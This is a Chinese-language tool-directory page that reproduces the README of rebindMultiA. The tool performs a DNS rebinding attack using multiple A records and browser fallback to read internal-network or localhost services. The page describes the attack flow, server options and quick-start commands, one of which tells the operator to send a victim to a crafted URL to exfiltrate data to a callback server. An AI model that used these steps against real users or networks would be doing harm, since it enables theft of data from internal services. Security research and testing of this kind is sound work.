Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rebindMultiA — DNS 重绑定攻击工具,利用多个 A 记录绕过同源策略,并通过浏览器回退行为从内部网络服务中窃取数据。 | Kitploit
工具/GitHubGitHub/rhynorater/rebindmultia
漏洞利用Web应用程序漏洞利用渗透测试红队DNS 分析
GitHubrhynorater/rebindmultia

rebindMultiA

DNS 重绑定攻击工具,利用多个 A 记录绕过同源策略,并通过浏览器回退行为从内部网络服务中窃取数据。

查看仓库
64983年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

rebindMultiA

rebindMultiA 是一款用于执行多 A 记录重绑定攻击(Multiple A Record Rebind Attack)的工具。

rebindmultia.com 是我搭建的一个域名,用于辅助此类攻击。它使每个 IP 都成为 [IP].ns.rebindmultia.com 域名的权威名称服务器。例如,13.33.33.37.ns.rebindmultia.com 的权威名称服务器是 13.33.33.37.ip.rebindmultia.com,该服务器(如您所料)解析为 13.33.33.37。

多 A 记录重绑定攻击

多 A 记录重绑定攻击是 DNS 重绑定的一种变体,它利用攻击者能在 DNS 响应中返回两个 IP 地址的能力,以及浏览器在第一个 IP 无响应时倾向于回退到 DNS 响应中第二个 IP 的特性。在此攻击中,攻击者将配置一个恶意 DNS 服务器和两个恶意 HTTP 服务器。DNS 服务器将返回两个 A 记录:

root@kitploit:~
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 13.33.33.37
127.0.0.1.target.13.33.33.37.ns.rebindmultia.com. 0 IN A 127.0.0.1

受害者的浏览器会连接第一个 IP,并与攻击者的第一个恶意 HTTP 服务器开始交互。该服务器返回的页面包含两个 iframe,一个指向 /steal,另一个指向 /rebind。/steal iframe 会加载一个恶意页面,用于访问第二个 iframe 并抓取内容。/rebind 端点在收到请求时会返回 302 重定向到 /,并关闭第一个恶意 HTTP 服务器。因此,当浏览器再次访问攻击者的 HTTP 服务器时,会发现端口已关闭。此时浏览器会回退到第二个 IP。一旦目标内容在第二个 iframe 中加载完成,第一个 iframe 即可访问它,窃取数据并外传到攻击者的第二个恶意 HTTP 服务器——回调服务器。

此攻击仅在 Windows 环境下有效。 Linux 和 Mac 系统会优先使用私有 IP,攻击者的服务器永远不会被查询。

图解 + 说明

截图

  1. 浏览器解析主机名 127.0.0.1.target.13.33.33.37.ns.rebindmultia.com。
  2. DNS 服务器(包含在 server.py 中)解析请求的 DNS 名称,并返回两个 A 记录:13.33.33.37 和 127.0.0.1。
  3. 受害者浏览器连接攻击者的恶意 HTTP 服务器(包含在 server.py 中),加载包含两个 iframe 的 /parent 页面。
  4. 受害者浏览器从攻击者的恶意 HTTP 服务器加载 /steal。
  5. 受害者浏览器加载 /rebind,该请求返回 302 重定向到 /(HTTP 服务器会在处理此请求后退出)。
  6. 受害者浏览器根据攻击者服务器返回的 302 重定向到 /。
  7. 受害者浏览器尝试从攻击者(现已关闭)的 HTTP 服务器加载 /,但连接失败。
  8. 浏览器随后切换到 DNS 缓存中的第二个 IP,将主机名解析为 127.0.0.1,并连接到该服务器,在 iframe 中加载页面。

用法

root@kitploit:~
pip3 install -r requirements.txt
python3 server.py --help
root@kitploit:~
usage: server.py [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

optional arguments:
  -h, --help            显示此帮助信息并退出
  -p PORT, --port PORT  指定在目标 IP 上攻击的端口。默认:80
  -c CALLBACK_PORT, --callback-port CALLBACK_PORT
                        指定回调 HTTP 服务器的端口。默认:31337
  -d DNS_PORT, --dns-port DNS_PORT
                        指定 DNS 服务器的端口。默认:53
  -f FILE, --file FILE  指定在第一个 iframe 中显示的 HTML 文件(即 "steal" iframe)。默认:steal.html
  -l LOCATION, --location LOCATION
                        指定要在目标上窃取的数据的位置。默认:/

如果遇到以下错误:

root@kitploit:~
┬─[justin@RhynoDroplet:~/p/rebindMultiA]─[14:26:24]─[G:master=]
╰─>$ python3 server.py

Traceback (most recent call last):
  File "server.py", line 2, in <module>
    from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

则需要使用更新版本的 Python。要求 Python 3.7 及以上。

快速开始

此操作必须在公网可访问的 IP 上执行。

root@kitploit:~
git clone https://github.com/Rhynorater/rebindMultiA
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to http://127.0.0.1.target.`curl -s http://ipinfo.io/ip`.ns.rebindmultia.com/parent to exfil 127.0.0.1"
sudo python3 server.py
下载工具
  • 攻击者的 steal iframe 访问新加载的第二个 iframe,抓取内容。
  • 攻击者的 steal iframe 将结果发送回攻击者的回调服务器。